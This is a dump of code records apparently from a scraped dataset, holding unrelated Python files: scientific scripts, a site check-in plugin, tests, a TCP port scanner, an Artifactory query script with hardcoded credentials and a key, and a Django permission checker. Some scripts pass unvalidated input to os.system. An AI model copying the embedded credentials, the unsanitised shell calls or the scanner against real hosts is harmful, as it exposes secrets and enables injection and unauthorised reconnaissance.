dpi=1000)\r\n\t\r\n\tprint(\"%s\" % myseason)\r\n\t\r\n","sub_path":"气候诊断/example/CP和Wave-Activity-Flux叠加.py","file_name":"CP和Wave-Activity-Flux叠加.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198607867","text":"# -*- coding: utf-8 -*-\r\nimport os,sh\r\nos.chdir('/home/userroot/ncbi/public/sra/')\r\nlistSra = open('./SRR_Acc_List.txt')\r\nall_lines = listSra.readlines()\r\nfor line in all_lines:\r\n print (line)\r\n os.system('prefetch %s' %(line))\r\n os.system('fastq-dump %s' %(line))\r\nlistSra.close()\r\n","sub_path":"python/sra_prefetch.py","file_name":"sra_prefetch.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367025202","text":"#!/usr/bin/env python\nimport time\nimport serial\n\nser = serial.Serial(\n port='/dev/dm1_front',\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n )\ncounter=0\n#while 1:\n# x=ser.read(5)\n# x=x.replace('R','1')\n# y=int(x)\n# c=y-1006\n# print c*2.5+20\n\ndef dm_1():\n ser.write('Write counter: %d \\n'%(counter))\n x=ser.read(5)\n #x=x.replace('R','1')\n y =int(x[1:4])\n c=y-1008\n d = c*2.5+25\n return y\n","sub_path":"makhnyov/com_distance_sensor1.py","file_name":"com_distance_sensor1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244670311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 20 11:56:47 2017\n\n@author: Mic\n\n- Funziona\n- la lascio che c'è da correggere in EllipticalMirror pTan e quindi VersosNorm\n- la lascio che c'è ancora l'inifto bisticco tra XYCentre e XYCentre, XYF1 e XYF1\n\n\n\"\"\"\nimport importlib\nimport numpy as np\n\nimport wiselib2.Rayman as rm\nimport wiselib2.Fundation as Fundation\nimport wiselib2.Optics as Optics\nimport wiselib2.ToolLib as tl\nimport csv\nimportlib.reload(Fundation)\nimportlib.reload(Optics)\nimportlib.reload(tl)\nimportlib.reload(rm)\n\nfrom wiselib2.must import *\nfrom wiselib2.Fundation import OpticalElement\n\nprint(__name__)\nif __name__ == '__main__':\n\n tl.Debug.On = True\n # SOURCE\n #------------------------------------------------------------\n Lambda = 5e-9\n Waist0 =60e-6\n s_k = Optics.SourceGaussian(Lambda, Waist0)\n s_pd = Fundation.PositioningDirectives(\n ReferTo = 'absolute', \n XYCentre = [0,0],\n Angle = np.deg2rad(0))\n s = OpticalElement(\n s_k, \n PositioningDirectives = s_pd, \n Name = 'source', IsSource = True)\n\n\n # KB(h)\n #------------------------------------------------------------ \n f1 = 16\n f2 = 4\n kbh_k = Optics.MirrorElliptic(f1 = f1, f2 = f2 , L= 0.4, Alpha = np.deg2rad(2.5))\n kbh_pd = Fundation.PositioningDirectives(\n ReferTo = 'source',\n PlaceWhat = 'upstream focus',\n PlaceWhere = 'centre')\n kbh = OpticalElement(\n kbh_k, \n PositioningDirectives = kbh_pd, \n Name = 'kbh')\n\n \n\n # detector (h)\n #------------------------------------------------------------\n d_k = Optics.Detector(\n L=100e-6, \n AngleGrazing = np.deg2rad(90) )\n d_pd = Fundation.PositioningDirectives(\n ReferTo = 'upstream',\n PlaceWhat = 'centre',\n PlaceWhere = 'downstream focus',\n Distance = 0)\n d = OpticalElement(\n d_k, \n PositioningDirectives = d_pd, \n Name = 'detector')\n\n\n # Assemblamento beamline\n #------------------------------------------------------------\n t = None\n t = Fundation.BeamlineElements()\n t.Append(s)\n# t.Append(pm1a)\n t.Append(kbh)\n t.Append(d)\n t.RefreshPositions()\n\n\n\n\n #%% Calcolo il campo fin sullo specchio\n \n t.ComputationSettings.NPools = 1\n t.ComputeFields(s,kbh, Verbose = False)\n \n #%% plotr Del raggio di curvature\n plt.figure(1)\n z_ = np.linspace(11,32,1000)\n R_ = s.CoreOptics.RCurvature(z_)\n plot(z_,R_-z_)\n #plot(z_,z_,'-')\n plt.xlabel('z (m)')\n plt.ylabel('R (m)')\n\n#%% Focus Sweep\n\n '''\n Il modo più semplice di pensare il focus sweep è:\n - propagare il campo fin sullo specchio (lo specchio POSSIEDE un campo calcolato)\n - usare la funzione Focus\n\n '''\n DefocusList = np.linspace(-40e-3, 0e-3, 21)\n DefocusList_mm = DefocusList * 1e3\n\n ResultList, HewList, More = Fundation.FocusSweep(kbh, DefocusList, DetectorSize = 50e-6)\n\n N = len(ResultList)\n \n for Res in ResultList:\n plt.figure()\n plot(abs(Res.Field))\n\n#%%\n \n plt.figure()\n plot(DefocusList_mm, HewList,'.')\n plt.xlabel('defocus (mm)')\n plt.ylabel('Hew')\n \n#%% confronto con waist\n\n iMin = tl.MinHew(HewList)\n zMin = DefocusList[iMin]\n r = ResultList[iMin].S\n ISym = abs(ResultList[iMin].Field)**2\n ISym = ISym / max(ISym)\n \n (a, x0, sigma) = tl.FitGaussian1d(ISym, r)\n \n plt.figure(1)\n plot(r*1e6,ISym,'g')\n plt.xlabel('um')\n #%%\n plt.figure()\n r2 = np.linspace(-100e-6, 100e-6, 1000)\n ITeo2 = s.CoreOptics.Amplitude(r2,0)**2\n \n \n (a2, x02, sigma2) = tl.FitGaussian1d(ITeo2, r2)\n \n plot(r2*1e6,ITeo2 ,'r')\n plt.xlabel('um')\n\n\n sigma2/sigma\n \n #%% provo a vedere quanto vale il pi*w0^2/lambda^2/z^2, che chiamo gamma\n z = f1\n# zRatio = (np.pi * s_k.Waist0**2 / s_k.Lambda/z)**2\n zRatio = s_k.RayleighRange**2/z**2\n g = zRatio * 1e3\n gg = 25/g\n print(g)\n print(gg)\n \n \n #%% provo con la costruzione geometrica\n \n N = 100\n [Mir_x, Mir_y] = kbh.CoreOptics.GetXY(N)\n\n pOutList = np.zeros(N)\n for (i,x) in enumerate( Mir_x):\n pIn, pOut = kbh_k.TraceRay([0,0], x)\n pOutList[i] = pOut \n \n \n \n \n \n","sub_path":"Examples/uso_Beamline_vero_04_calcolo_campo_diproi_SORGENTE+KB+DETECTOR_DIPROI_Focus_Sweep_Specchio_piano.py","file_name":"uso_Beamline_vero_04_calcolo_campo_diproi_SORGENTE+KB+DETECTOR_DIPROI_Focus_Sweep_Specchio_piano.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"36647821","text":"from collections import OrderedDict\nfrom umsgpack import packb\nimport base64\nimport datetime\nimport dateutil.parser\n\nfrom Cryptodome.Hash import SHA256\n\nfrom libs import Identity\nfrom .exceptions import ValidationError\n\n\ndef verify_sha256(content, providen_hash: bytes):\n \"\"\"verify_sha256\n\n Helper function for SHA256 hash verification\n\n :param content: Any object\n :param providen_hash: hash digest bytestring\n \"\"\"\n\n if type(content) == str:\n content = content.encode()\n elif isinstance(content, dict):\n # Sometimes content is wrongfullty decoded beforehand\n content = packb(content)\n return providen_hash == SHA256.new(content).digest()\n\n\ndef validate_timestamped_signature(pubkey: str, _hash: bytes, signature: dict):\n \"\"\"validate_timestamped_signature\n\n Validates a timestamped signature.\n\n :param pubkey: User's public Key\n :param _hash: Provided hash.\n :param signature: Signature to verify, decoded msgpack object\n \"\"\"\n\n identity = Identity(pubkey)\n\n sign = signature['signature']\n timestamp = signature['timestamp']\n\n validator_map = OrderedDict()\n validator_map['timestamp'] = timestamp\n validator_map['messageHash'] = base64.b64encode(hash)\n\n validator = packb(validator_map)\n\n if not identity.verify(validator, sign):\n raise ValidationError('Invalid sign')\n\n\ndef validate_objects(sender_pubkey, objects=[]):\n \"\"\"validate_objects\n\n Validates all the objects received with a message\n\n :param sender_pubkey: User's public key\n :param objects: Object list\n \"\"\"\n # For each container\n for _object in objects:\n\n # if objectContainer be present\n container = _object.get('objectContainer')\n container_hash = _object.get('objectHash')\n if container:\n # Validate container hash\n verify_sha256(container, container_hash)\n\n # Validate container signature\n validate_timestamped_signature(\n sender_pubkey, container_hash, _object.get('containerSig'))\n","sub_path":"authorizer/authorizer/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"513874322","text":"import re\nfrom urllib.parse import urljoin\n\nfrom ..schema.nexusphp import AttendanceHR\nfrom ..schema.site_base import Work, SignState\n\n\nclass MainClass(AttendanceHR):\n URL = 'https://1ptba.com/'\n USER_CLASSES = {\n 'downloaded': [805306368000, 3298534883328],\n 'share_ratio': [3.05, 4.55],\n 'days': [280, 700]\n }\n\n def build_workflow(self, entry, config):\n return [\n Work(\n url='/attendance.php',\n method='param',\n succeed_regex=[\n '这是您的第.*?次签到,已连续签到.*?天,本次签到获得.*?魔力值。|這是您的第.*次簽到,已連續簽到.*?天,本次簽到獲得.*?魔力值。',\n '[签簽]到已得\\\\d+',\n '您今天已经签到过了,请勿重复刷新。|您今天已經簽到過了,請勿重複刷新。'],\n check_state=('final', SignState.SUCCEED),\n is_base_content=True\n )\n ]\n\n def sign_in_by_param(self, entry, config, work, last_content=None):\n response = self._request(entry, 'get', work.url)\n if response:\n location_match = re.search('window\\\\.location=\"(.*?);', response.text)\n if location_match:\n uri = re.sub('[\"|+| ]', '', location_match.group(1))\n work.url = urljoin(work.url, uri)\n return self.sign_in_by_get(entry, config, work, last_content)\n else:\n return response\n","sub_path":"ptsites/sites/1ptba.py","file_name":"1ptba.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535804124","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport unittest\nimport time\n\nfrom datetime import datetime\n\nimport atsd_client\nfrom atsd_client import services\nfrom atsd_client.models import EntityFilter, DateFilter\nfrom atsd_client.models import Message\nfrom atsd_client.models import MessageQuery\nfrom atsd_client import _time_utilities as tu\n\nlogger = logging.getLogger()\nlogger.disabled = True\n\nENTITY = 'pyapi.entity'\nTYPE = 'pyapi.type'\nSOURCE = 'pyapi.source'\nTAG = 'pyapi.tag'\nTAG_VALUE = 'pyapi.tag-value'\nTAGS = {TAG: TAG_VALUE}\nSEVERITY = 'MINOR'\nMESSAGE = 'pyapi test message'\n\n\ndef get_connection():\n conn = atsd_client.connect_url('https://localhost:8443', 'axibase', 'axibase')\n return conn\n\n\nclass TestMessageService(unittest.TestCase):\n def setUp(self):\n self.ms = services.MessageService(\n get_connection()\n )\n\n \"\"\"\n Check parameters were set as expected.\n \"\"\"\n\n def test_fields_match(self):\n DATE = datetime.now()\n m = Message(TYPE, SOURCE, ENTITY, DATE, SEVERITY, TAGS, MESSAGE, persist=False)\n self.assertEqual(TYPE, m.type)\n self.assertEqual(SOURCE, m.source)\n self.assertEqual(ENTITY, m.entity)\n self.assertEqual(tu.to_date(DATE), m.date)\n self.assertEqual(SEVERITY, m.severity)\n self.assertEqual(TAGS, m.tags)\n self.assertEqual(MESSAGE, m.message)\n self.assertFalse(m.persist)\n\n \"\"\"\n Check inserted and retrieved messages are equal.\n \"\"\"\n\n def test_insert_retrieve(self):\n DATE = datetime.now()\n msg = Message(TYPE, SOURCE, ENTITY, DATE, SEVERITY, TAGS, MESSAGE)\n self.ms.insert(msg)\n\n time.sleep(2)\n\n ef = EntityFilter(entity=ENTITY)\n df = DateFilter(start_date=DATE, end_date=datetime.now())\n query = MessageQuery(entity_filter=ef, date_filter=df)\n result = self.ms.query(query)\n\n print(result)\n\n self.assertIsNotNone(result)\n self.assertGreater(len(result), 0)\n m = result[0]\n self.assertIsInstance(m, Message)\n \"\"\"\n In the future may be replaced with:\n self.assertItemsEqual(msg.__dict__.items(), m.__dict__.items())\n \"\"\"\n self.assertEqual(msg.type, m.type)\n self.assertEqual(msg.source, m.source)\n self.assertEqual(msg.entity, m.entity)\n # Uncomment when JodaTime will be replaced\n # self.assertEqual(msg.date, m.date)\n self.assertEqual(msg.severity, m.severity)\n self.assertEqual(msg.tags, m.tags)\n self.assertEqual(msg.message, m.message)\n self.assertEqual(msg.persist, m.persist)\n","sub_path":"tests/test_message_service.py","file_name":"test_message_service.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"388265294","text":"name = input(\"Enter name: \")\r\nfriend_name = input(\"Enter friend's name: \")\r\n\r\nif name == friend_name:\r\n friend = input(\"Do you and your friend really have the same name? Type yes or no.\")\r\n friend = str.lower(friend)\r\n if friend == 'yes':\r\n print(\"Having the same name is cool!\")\r\n elif friend == 'no':\r\n friend_name = input(\"Enter another name besides your own: \")\r\n print(\"Your friend's name is\", friend_name + \".\")\r\n else:\r\n print(\"You did not enter yes or no.\")\r\nelse:\r\n print(\"Your friend's name is\", friend_name + \".\")","sub_path":"more on nes-con.py","file_name":"more on nes-con.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150892080","text":"import xlrd\nimport json\n\n# zaradi težav z excellom potrebne podatke shraniva v json format\n\nslo_sklad = {'Sklad-3': 3, 'Sklad-7': 7}\nIME_DATOTEKE_S_PODATKI1 = \"ND_00_Seznam klasifikacij po dovoljenjih.xlsx\"\nIME_DATOTEKE_S_PODATKI2 = \"001_Evidenca_odpadko_v_skladiscu.xlsm\"\ndat = xlrd.open_workbook(IME_DATOTEKE_S_PODATKI1)\nlist1 = dat.sheet_by_index(1)\nslo_klas_ste_ime = dict()\nfor i in range(1, 840): # po vrsticah\n kl_st = list1.cell_value(i, 0)\n ime = list1.cell_value(i, 1)\n slo_klas_ste_ime[kl_st] = ime\ndat2 = xlrd.open_workbook(IME_DATOTEKE_S_PODATKI2)\n# da bomo tabelo podjetja napolnit\nlist3 = dat2.sheet_by_index(4)\nslo_id_podjetje = dict() # zato da bo id od podjetja nekje shranjen\nmn_pod = set()\nst = 1\nfor i in range(1, 334):\n vred = list3.cell_value(i, 1)\n if vred and vred not in {'x', 'X'}:\n pod = vred.upper()\n if pod not in mn_pod:\n # z velikimi črkami zaradi neusklajenosti pisanja v excellu\n mn_pod.add(pod)\n slo_id_podjetje[pod] = st\n st += 1\ndat = xlrd.open_workbook(IME_DATOTEKE_S_PODATKI2)\n# da bomo tabelo podjetja napolnit\nvhod = dat.sheet_by_index(4) # 334 vrstic\nslo_opombe = dict()\nsez_podatkov = dict()\nstevec_opombe = 1\nfor i in range(1, 334):\n kl_st = vhod.cell_value(i, 0)\n povzrocitelj = vhod.cell_value(i, 1)\n opomba_uvoz = vhod.cell_value(i, 2)\n teza = vhod.cell_value(i, 3)\n sklad = vhod.cell_value(i, 4)\n datum = vhod.cell_value(i, 5)\n if datum and teza != 1: # teža 1 pomeni napako\n # pomeni ni prazna vrstica\n # spremenimo datum primeren za SQL\n if opomba_uvoz == 'x':\n opomba_uvoz = None\n if opomba_uvoz:\n # če je vsaj kakšen podatek še\n opomba_uvoz = opomba_uvoz.upper()\n if opomba_uvoz not in slo_opombe:\n slo_opombe[opomba_uvoz] = stevec_opombe\n stevec_opombe += 1\n if povzrocitelj.upper() in slo_id_podjetje.keys():\n povzrocitelj = slo_id_podjetje[povzrocitelj.upper()]\n else:\n povzrocitelj = None\n if sklad in slo_sklad.keys():\n sklad = slo_sklad[sklad]\n leto, mesec, dan, h, i, s = xlrd.xldate_as_tuple(datum, dat.datemode)\n sql_datum = str(leto) + '-' + str(mesec) + '-' + str(dan)\n teza = int(teza)\n sez_podatkov[(kl_st, teza)] = {'povzrocitelj': povzrocitelj, 'opomba_uvoz': slo_opombe.get(opomba_uvoz), \n 'skladisce': sklad, 'datum_uvoza': sql_datum, 'datum_izvoza': None, 'opomba_izvoz': None}\n # zato da bomo dopolnili še v primeru izvoza, ti ločujemo glede kl. številke in težo saj se trenutno ne ponavlje\nizhod = dat.sheet_by_index(5)\n# 297 vrstic\nfor i in range(1, 297):\n kl_st =izhod.cell_value(i, 0)\n opomba_izvoz = izhod.cell_value(i, 1)\n teza = izhod.cell_value(i, 2)\n datum_izv = izhod.cell_value(i, 3)\n sklad = izhod.cell_value(i, 4)\n if teza:\n # pomeni ni prazna vrstica\n # spremenimo datum primeren za SQL\n if opomba_izvoz == 'x':\n opomba_izvoz = None\n if opomba_izvoz:\n # če je vsaj kakšen podatek še\n opomba_izvoz = opomba_izvoz.upper()\n if opomba_izvoz not in slo_opombe:\n slo_opombe[opomba_izvoz] = stevec_opombe\n stevec_opombe += 1\n povzrocitelj = povzrocitelj.upper()\n leto1, mesec1, dan1, h, i, s = xlrd.xldate_as_tuple(datum_izv, dat.datemode)\n sql_datum1 = str(leto1) + '-' + str(mesec1) + '-' + str(dan1)\n if (kl_st, teza) in sez_podatkov.keys():\n sez_podatkov[kl_st, teza]['datum_izvoza'] = sql_datum1\n sez_podatkov[kl_st, teza]['opomba_izvoz'] = slo_opombe.get(opomba_izvoz)\nslo_opombe['HDPE'] = stevec_opombe\nstevec_opombe += 1\nslo_opombe['EKO-2'] = stevec_opombe\nstevec_opombe += 1\nslo_opombe['ZOKI-1'] = stevec_opombe\nstevec_opombe += 1\nslo_opombe['OSTALO'] = stevec_opombe\nskup_slo = {'slo_klas_ste_ime': slo_klas_ste_ime, \n 'slo_id_podjetje': slo_id_podjetje,\n 'slo_sklad': slo_sklad,\n 'slo_opombe': slo_opombe}\nvmesni = dict()\nfor i, kl in enumerate(sez_podatkov):\n vmesni[str(i)] = list(kl) + list(sez_podatkov[kl].items())\nskup_slo['sez_podatkov'] = vmesni\nwith open(\"podatki.json\", \"w\") as pisi_podatki:\n json.dump(skup_slo, pisi_podatki)\n\n\n\n\n ","sub_path":"excel_json.py","file_name":"excel_json.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161700417","text":"'''\nGaussian Density and Gradient\n-------------------------------------\nGaussian_transform: compute the probability density and spatial density gradient based on Gaussian Mixture Model \n'''\nimport math\nimport numpy as np\n\n\ndef Gaussian_transform(S, M, scale):\n m = S.shape[0]\n n = M.shape[0]\n cross_term = 0\n grad = np.zeros((n,2))\n for i in range(n):\n for j in range(m):\n dist_ij = math.exp(-((S[j,0]-M[i,0])*(S[j,0]-M[i,0])+(S[j,1]-M[i,1])*(S[j,1]-M[i,1])) / (scale*scale))\n cross_term += dist_ij/(n*m)\n grad[i] += -dist_ij*2*(S[j]-M[i])/(m*n*scale*scale)\n return cross_term, grad\n","sub_path":"_gaussiantransform.py","file_name":"_gaussiantransform.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538169845","text":"#!/usr/bin/python3\nimport json\nimport sys\nfrom cryptography.fernet import Fernet\nfrom artifactory import ArtifactoryPath\nfrom requests.auth import HTTPBasicAuth\n\nkey = b'iwJsebH4vFt8fB6-7k7zZjt6VNLgjjJLl5g1F1B8TVo='\ncipher_suite = Fernet(key)\nciphered_text = b'gAAAAABetXhhcm52CJnfO81tb91Fb_ds3I_bGsoRHOm0H6qFUfPrrvRz_sKJEO2M8ACqBHV-cjrARl18vg-F-liSmNP2oWxSHw=='\nunciphered_text = (cipher_suite.decrypt(ciphered_text))\nunciphered_text = str(unciphered_text,'utf-8')\n#print(unciphered_text)\nunciphered_text=\"thisismycreds\"\n\ntry:\n\n reponame = sys.argv[1]\n #daysdownloaded = sys.argv[2]\n #dayscreated = int(sys.argv[3])\n #print(\"repo: %s downloaded archive days: %s Non-downloaded Artifacts: %s\" % (reponame, daysdownloaded, dayscreated))\n\nexcept:\n print(\"No arguments passed or argument incomplete or invalid argument.\")\n sys.exit()\n\n\naql = ArtifactoryPath(\n \"http://artifactory-test-am2.devops.aig.net/artifactory/\",\n auth=(\"demouser\", unciphered_text),\n auth_type=HTTPBasicAuth,\n)\n\n\n\nargs = [ \n\n\"items.find\",\n\t{ \"repo\": reponame,\n \"$and\": [\n\t\t{\"type\":\"file\"},\n#\t\t{\"created_by\":\"abanzon\"},\n# \t{\"size\":{\"$gt\":\"0\"}}\n# {\"created\": {\"$gt\":\"2020-05-05\"}}\n\t\t]\n\t},\n#sort({\"$desc\": [\"size\",\"name\"]}),\n#limit(100)\n]\n\ntry:\n\n #artifacts_list = aql.aql(*args)\n artifacts_list = aql.aql(*args, \".include\", [\"stat.*\", \"release_artifact.*\", \"dependency.*\", \"artifact.*\", \"archive.*\", \"property.*\"])\n artifact_pathlib = map(aql.from_aql, artifacts_list)\n artifact_pathlib_list = list(map(aql.from_aql, artifacts_list))\n\nexcept:\n\n print(\"Invalid value, please check arguments.\")\n sys.exit()\n\npathlist = []\n\nfor mylist in artifacts_list:\n checkpath = str(mylist['repo'] + \"/\" + mylist['path'])\n if checkpath not in pathlist:\n pathlist.append(checkpath)\n\nfor display in pathlist:\n print(display)\n\n #print(mylist['repo'] + \"/\" + mylist['path'])\n #print(\"###############\")\n #print(mylist['repo'] + \"/\" + mylist['path'] + \" \" + mylist['modified'])\n #print(\"Array 0 HERE\")\n #print (mylist['properties'][0])\n #print(\"Array 1 HERE\")\n #print (mylist['properties'][1])\n #print(\"Array 2 HERE\")\n #print (mylist['properties'][2])\n\n","sub_path":"artifactoryAQL.py","file_name":"artifactoryAQL.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68117715","text":"from country_codes import get_country_code\nimport json\nfrom pygal.maps.world import COUNTRIES\n\nfilename = 'population_data.json'\n\nwith open(filename) as f:\n pop_data = json.load(f)\n\npop_data2010 = []\nfor dictionary in pop_data:\n if dictionary['Year'] == '2010':\n pop_data2010.append(dictionary)\n\n\n#print(len(pop_data2010))\n#print(pop_data2010)\n\npop_temp = []\nfor countries in pop_data2010:\n code = get_country_code(countries['Country Name'])\n if code == None:\n print(countries['Country Name'])\n\nprint(COUNTRIES)\n","sub_path":"ProjectII_Py/tryit_16_5.py","file_name":"tryit_16_5.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"349901321","text":"\"\"\"\n SoftLayer.utils\n ~~~~~~~~~~~~~~~\n Utility function/classes\n\n :license: MIT, see LICENSE for more details.\n\"\"\"\nimport re\nimport six\n\nUUID_RE = re.compile('^[0-9a-f\\-]{36}$', re.I)\nKNOWN_OPERATIONS = ['<=', '>=', '<', '>', '~', '!~', '*=', '^=', '$=', '_=']\n\nconfigparser = six.moves.configparser # pylint: disable=E1101\nconsole_input = six.moves.input # pylint: disable=E1101\nstring_types = six.string_types\nStringIO = six.StringIO\n\n\n# Code from http://stackoverflow.com/questions/11700798/python-accessing-values-nested-within-dictionaries # NOQA\ndef lookup(dic, key, *keys):\n if keys:\n return lookup(dic.get(key, {}), *keys)\n return dic.get(key)\n\n\nclass NestedDict(dict):\n\n def __getitem__(self, key):\n if key in self:\n return self.get(key)\n return self.setdefault(key, NestedDict())\n\n def to_dict(self):\n d = {}\n for k, v in self.items():\n if isinstance(v, NestedDict):\n d[k] = v.to_dict()\n else:\n d[k] = v\n return d\n\n\ndef query_filter(query):\n \"\"\" Translate a query-style string to a 'filter'. Query can be the\n following formats:\n\n Case Insensitive\n 'value' OR '*= value' Contains\n 'value*' OR '^= value' Begins with value\n '*value' OR '$= value' Ends with value\n '*value*' OR '_= value' Contains value\n\n Case Sensitive\n '~ value' Contains\n '!~ value' Does not contain\n '> value' Greater than value\n '< value' Less than value\n '>= value' Greater than or equal to value\n '<= value' Less than or equal to value\n\n :param string query: query string\n\n \"\"\"\n try:\n return {'operation': int(query)}\n except ValueError:\n pass\n\n if isinstance(query, string_types):\n query = query.strip()\n for op in KNOWN_OPERATIONS:\n if query.startswith(op):\n query = \"%s %s\" % (op, query[len(op):].strip())\n return {'operation': query}\n if query.startswith('*') and query.endswith('*'):\n query = \"*= %s\" % query.strip('*')\n elif query.startswith('*'):\n query = \"$= %s\" % query.strip('*')\n elif query.endswith('*'):\n query = \"^= %s\" % query.strip('*')\n else:\n query = \"_= %s\" % query\n\n return {'operation': query}\n\n\nclass IdentifierMixin(object):\n \"\"\" This mixin provides an interface to provide multiple methods for\n converting an 'indentifier' to an id \"\"\"\n resolvers = []\n\n def resolve_ids(self, identifier):\n \"\"\" Takes a string and tries to resolve to a list of matching ids. What\n exactly 'identifier' can be depends on the resolvers\n\n :param string identifier: identifying string\n\n :returns list:\n \"\"\"\n\n return resolve_ids(identifier, self.resolvers)\n\n\ndef resolve_ids(identifier, resolvers):\n \"\"\" Resolves IDs given a list of functions\n\n :param string identifier: identifier string\n :param list resolvers: a list of functions\n :returns list:\n \"\"\"\n\n # Before doing anything, let's see if this is an integer\n try:\n return [int(identifier)]\n except ValueError:\n pass # It was worth a shot\n\n # This looks like a globalIdentifier (UUID)\n if len(identifier) == 36 and UUID_RE.match(identifier):\n return [identifier]\n\n for resolver in resolvers:\n ids = resolver(identifier)\n if ids:\n return ids\n\n return []\n","sub_path":"SoftLayer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203385405","text":"import getopt,socket,sys,re\n\nclass Scan:\n def __init__(self,args):\n self._getargs(args)\n def _getargs(self,args):\n opt = dict(getopt.getopt(args,'',['host=','port='])[0])\n host = opt.get('--host')\n host_match = re.match('\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}',host)\n if not host_match:\n print('Parameter Error')\n sys.exit(-1)\n self.host = host\n port_str = opt.get('--port')\n port_l = port_str.split('-')\n port = []\n\n for i in port_l:\n if not i.isdigit():\n print('Parameter Error')\n sys.exit(-1)\n if len(port_l) == 1:\n port.append(int(port_l[0]))\n elif len(port_l) == 2:\n port = [ i for i in range(int(port_l[0]),int(port_l[1])+1)]\n\n self.port = port\n\n def start(self):\n for i in self.port:\n addr = (self.host,i)\n sk = socket.socket()\n ret = sk.connect_ex(addr)\n if ret:\n print('{} closed'.format(i))\n else:\n print('{} open'.format(i))\nif __name__ == '__main__':\n scan = Scan(sys.argv[1:])\n scan.start()\n\n\n\n","sub_path":"challenge7/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"589344743","text":"#! /usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# __author__ = \"Q1mi\"\r\n# Email: master@liwenzhou.com\r\n\r\n\"\"\"\r\n权限控制相关\r\n\"\"\"\r\n\r\nfrom django.shortcuts import render, HttpResponse, Http404, redirect\r\nfrom django.core.urlresolvers import resolve\r\nfrom django.contrib.auth.models import User, Group\r\n\r\n\r\n# 定义角色分组,不同的组只能对指定的model有相关权限\r\nrole_groups = {\r\n\t\"salesman\": [\"Customer\", \"ConsultRecord\"],\r\n\t\"teachers\": [\"Course\", \"ClassList\", \"CourseRecord\", \"StudyRecord\"],\r\n\t\"students\": [\"StudyRecord\"],\r\n}\r\n\r\n# 权限与动作对应关系\r\npermission_dic = {\r\n\t\"view_index\": [\"crm_index\", \"GET\", []], # 查看首页\r\n\t\"view_record_details\": [\"model_detail\", \"GET\", []], # 查看记录详情\r\n\t\"change_record_details\": [\"change_model_detail\", \"POST\", []], # 修改记录详情\r\n\t\"add_record\": [\"add_model_detail\", \"POST\", []], # 增加记录\r\n\t\"delete_record\": [\"delete_model\", \"POST\", []] # 删除记录\r\n}\r\n\r\n\r\n# 进项权限验证\r\ndef permission_check(*args, **kwargs):\r\n\trequest = args[0] # 默认第一个参数时request\r\n\tprint(request.user.get_group_permissions()) # 用户对应的组权限\r\n\tuser = request.user\r\n\tuser_groups = Group.objects.get(user=user) # 获得用户的组\r\n\tprint(user_groups)\r\n\tprint(\"=\" * 50)\r\n\turl_resolve_obj = resolve(request.path_info) # 从请求中分解到到url对象\r\n\tcurrent_url_namespace = url_resolve_obj.url_name # 提取需要的url信息\r\n\tprint(url_resolve_obj.kwargs) # url参数\r\n\turl_kwargs = url_resolve_obj.kwargs\r\n\r\n\tif len(url_kwargs) > 0:\r\n\t\tif not url_kwargs.get(\"model_name_str\", None) and url_kwargs.get(\"model_name_str\") in role_groups.get(user_groups):\r\n\t\t\tprint(\"{}没有权限操作表{}。\".format(user, url_kwargs.get(\"model_name_str\")))\r\n\t\t\treturn False\r\n\r\n\tprint(\"获取到url namespace:{}\".format(current_url_namespace))\r\n\tmatch_flag = False # 是否找到对应动作\r\n\tmatch_perm_key = None # 动作对应的字段名\r\n\tif current_url_namespace:\r\n\t\tprint(\"开始匹配动作...\")\r\n\t\tfor permission_key in permission_dic:\r\n\t\t\tpermission_value = permission_dic[permission_key]\r\n\t\t\tif len(permission_value) == 3: # 判断是不是有效的权限动作设置\r\n\t\t\t\turl_namespace, request_method, request_args = permission_value\r\n\t\t\t\tprint(url_namespace, request_method, request_args)\r\n\t\t\t\tif url_namespace == current_url_namespace: # url匹配\r\n\t\t\t\t\tif request_method == request.method: # 请求的方法匹配\r\n\t\t\t\t\t\tif not request_args: # 如果没有动作参数\r\n\t\t\t\t\t\t\tmatch_flag = True # 匹配上了\r\n\t\t\t\t\t\t\tmatch_perm_key = permission_key # 获得该请求动作对应的权限字段名\r\n\t\t\t\t\t\t\tprint(\"{} matched {}\".format(request, permission_key))\r\n\t\t\t\t\t\t\tbreak # 